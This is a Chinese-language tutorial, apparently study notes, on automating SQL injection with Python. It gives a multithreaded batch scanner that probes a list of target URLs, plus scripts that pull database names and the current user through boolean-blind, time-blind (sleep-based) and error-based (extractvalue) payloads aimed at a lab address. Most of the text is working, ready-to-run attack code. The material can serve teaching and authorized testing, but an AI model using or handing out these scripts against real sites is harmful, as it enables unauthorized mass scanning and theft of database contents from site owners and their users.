批量化脚本编写思路 在理解了联合查询、报错注入、布尔盲注和时间盲注的原理后,我们需要利用编程语言(通常为 Python)来代替人工进行繁琐的穷举和发包。
编写批量化注入脚本通常遵循以下核心流程:
确定注入点与特征 :找出 URL/POST 数据包中的可控参数,明确回显成功/失败的标志(布尔特征)或延时特征(时间特征)。
构造 Payload 模板 :使用字符串格式化(如 {})将需要动态替换的部分(如猜测的字符、长度等)预留出来。
自动化发包与逻辑判断 :利用循环或二分查找算法,不断向目标发送包含 Payload 的请求,并根据响应内容或响应时间提取数据。
并发与优化 :针对批量 URL 扫描或深度数据提取,引入多线程/协程提升速度。
核心库使用 在 Python 中编写 SQL 注入脚本,以下几个标准库和第三方库是必备的:
1. requests 库(网络请求核心) 用于发送 HTTP 请求,支持 GET/POST、自定义 Headers、Cookies 和代理。1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 import requestssession = requests.Session() headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } res = session.get(url, headers=headers, timeout=5 ) 主要用于时间盲注中的响应时间判断。 Python
2. time 库(时间控制与计算) 主要用于时间盲注中的响应时间判断。
1 2 3 4 5 6 7 8 import time start_time = time.time() res = requests.get(url) end_time = time.time() # 计算请求耗时 if end_time - start_time > 5: print("存在时间盲注!")
3. concurrent.futures 库(多线程/并发处理) 在批量扫描多个 URL,或者多字段同时爆破时,单线程效率极低,需要使用线程池。
1 2 3 4 5 6 7 8 9 10 from concurrent.futures import ThreadPoolExecutor def check_sqli(url): # 具体的检测逻辑 pass urls = ["[http://test.com/?id=1](http://test.com/?id=1)", "[http://test.com/?id=2](http://test.com/?id=2)"] # 开启 10 个线程并发执行 with ThreadPoolExecutor(max_workers=10) as executor: executor.map(check_sqli, urls)
通用脚本模板 这是一个用于批量检测多个 URL 是否存在基础 SQL 注入的通用框架模板。包含了参数解析、请求重试、文件读取和多线程等工程化功能。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 import requestsimport argparsefrom concurrent.futures import ThreadPoolExecutorfrom urllib.parse import urlparsefrom requests.packages.urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) def verify_sqli (url ): """ 通用检测函数:测试简单的布尔/报错特征 """ payloads = [ "' AND 1=1--+" , "' AND 1=2--+" ] try : res_true = requests.get(url + payloads[0 ], timeout=5 , verify=False ) res_false = requests.get(url + payloads[1 ], timeout=5 , verify=False ) if len (res_true.text) != len (res_false.text): print (f"[+] 发现疑似布尔盲注: {url} " ) return url except Exception as e: pass return None def main (): parser = argparse.ArgumentParser(description="SQL Injection Batch Scanner" ) parser.add_argument("-f" , "--file" , help ="包含目标 URL 的文本文件" , required=True ) parser.add_argument("-t" , "--threads" , help ="线程数,默认 10" , type =int , default=10 ) args = parser.parse_args() with open (args.file, 'r' ) as f: urls = [line.strip() for line in f if line.strip()] print (f"[*] 开始扫描,目标总数: {len (urls)} ,线程数: {args.threads} " ) with ThreadPoolExecutor(max_workers=args.threads) as executor: results = executor.map (verify_sqli, urls) print ("[*] 扫描完成!" ) if __name__ == "__main__" : main()
专项实战例子 为了提高效率,强烈建议在盲注中使用二分查找法 ,而不是从 a 到 z 挨个遍历。
1. 布尔盲注利用脚本(结合二分法) 利用基础笔记中 1' and if(substring(database(),1,1)='g',1,0)-- 的原理。此处用字符的 ASCII 码进行大小比较,实现二分查找。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 import requests url = "[http://192.168.110.1/?id=1](http://192.168.110.1/?id=1)" # 页面正常时的标识特征(需要根据实际情况修改) true_flag = "query success" def get_db_length(): """获取数据库名长度""" for i in range(1, 30): # 对应基础笔记:id=1' and length(database())=4 --+ payload = f"' and length(database())={i}--+" target = url + payload res = requests.get(target) if true_flag in res.text: print(f"[+] 数据库长度为: {i}") return i return 0 def get_db_name(length): """利用二分法获取数据库名""" db_name = "" for i in range(1, length + 1): low = 32 # 可见字符 ASCII 下限 high = 126 # 可见字符 ASCII 上限 while low <= high: mid = (low + high) // 2 # 对应基础笔记:id=1' and ascii(substring(database(),1,1))>97 --+ payload = f"' and ascii(substring(database(),{i},1))>{mid}--+" target = url + payload res = requests.get(target) if true_flag in res.text: # 页面正常,说明 ASCII 码大于 mid,区间右移 low = mid + 1 else: # 页面异常,说明 ASCII 码小于等于 mid,区间左移 high = mid - 1 db_name += chr(low) print(f"[*] 当前爆破进度: {db_name}") print(f"[+] 最终数据库名为: {db_name}") if __name__ == "__main__": length = get_db_length() if length > 0: get_db_name(length)
2. 时间盲注利用脚本 对应基础笔记中 select if(length(database())>1,sleep(5),0) -- 的原理。时间盲注不依赖页面内容的变化,只关注请求的响应时间 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 import requests import time url = "[http://192.168.110.1/?id=1](http://192.168.110.1/?id=1)" # 设定的延迟阈值 time_threshold = 4 def get_db_name_by_time(length=8): db_name = "" for i in range(1, length + 1): low = 32 high = 126 while low <= high: mid = (low + high) // 2 # 构造时间盲注 Payload # 注意:时间盲注通常也会结合布尔逻辑的二分法 payload = f"' and if(ascii(substring(database(),{i},1))>{mid},sleep({time_threshold}),0)--+" target = url + payload try: start_time = time.time() requests.get(target, timeout=10) # 设置一个较大的 timeout 防止 requests 断开 end_time = time.time() # 判断延时是否发生 if end_time - start_time >= time_threshold: low = mid + 1 else: high = mid - 1 except requests.exceptions.Timeout: # 如果触发了 timeout 异常,也说明发生了延时 low = mid + 1 db_name += chr(low) print(f"[*] 基于时间的爆破进度: {db_name}") print(f"[+] 最终数据库名为: {db_name}") if __name__ == "__main__": get_db_name_by_time(length=8) # 假设已知长度为 8
3. 报错注入批量检测脚本 对应基础笔记中的 updatexml, extractvalue, 甚至数学溢出 exp(~(select * from (select user())a)) 等报错。报错注入的优势在于只需一次请求即可带出数据,无需逐字爆破。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 import requests import urllib.parse import re def test_error_based(url): print(f"[*] 正在测试报错注入: {url}") # 将基础笔记中的报错 payload 进行 url 编码 # 使用 0x7e (~) 作为标志符包裹我们要查询的数据 (这里查的是 user()) raw_payload = "' AND (extractvalue(1,concat(0x7e,(select user()),0x7e)))--+" # 因为 payload 里有空格、引号、加号等,直接拼接在 URL 后面容易被截断,所以要 URLEncode payload = urllib.parse.quote(raw_payload) target = f"{url}{payload}" try: # 发送请求,设置超时防止卡死 res = requests.get(target, timeout=5) # 检查常见的 MySQL 报错特征或自定义的 0x7e(~) 回显 if "XPATH syntax error" in res.text or "~" in res.text: print(f"[!] 确认存在报错注入!") # 使用正则提取爆出的数据:匹配两个 ~ 之间的所有非 ~ 字符 # 正则表达式 r"~([^~]+)~" 的意思是:找一个 ~,接着捕获一堆不是 ~ 的字符,直到遇到下一个 ~ match = re.search(r"~([^~]+)~", res.text) if match: extracted_data = match.group(1) print(f"[+] 成功提取数据: {extracted_data}") else: print("[-] 触发了报错,但未能通过正则精确提取数据。可能是因为页面过滤或回显格式不标准。") # 打印前几百个字符辅助人工排查 # print(f"[*] 原始响应片段: {res.text[:500]}") else: print("[-] 未发现报错注入特征。") except requests.exceptions.RequestException as e: print(f"[-] 请求发生网络错误: {e}") if __name__ == "__main__": # 填入你要测试的目标 URL,注意 URL 结尾要留有准备拼接 payload 的参数位,例如 id=1 test_url = "http://192.168.110.1/?id=1" test_error_based(test_url)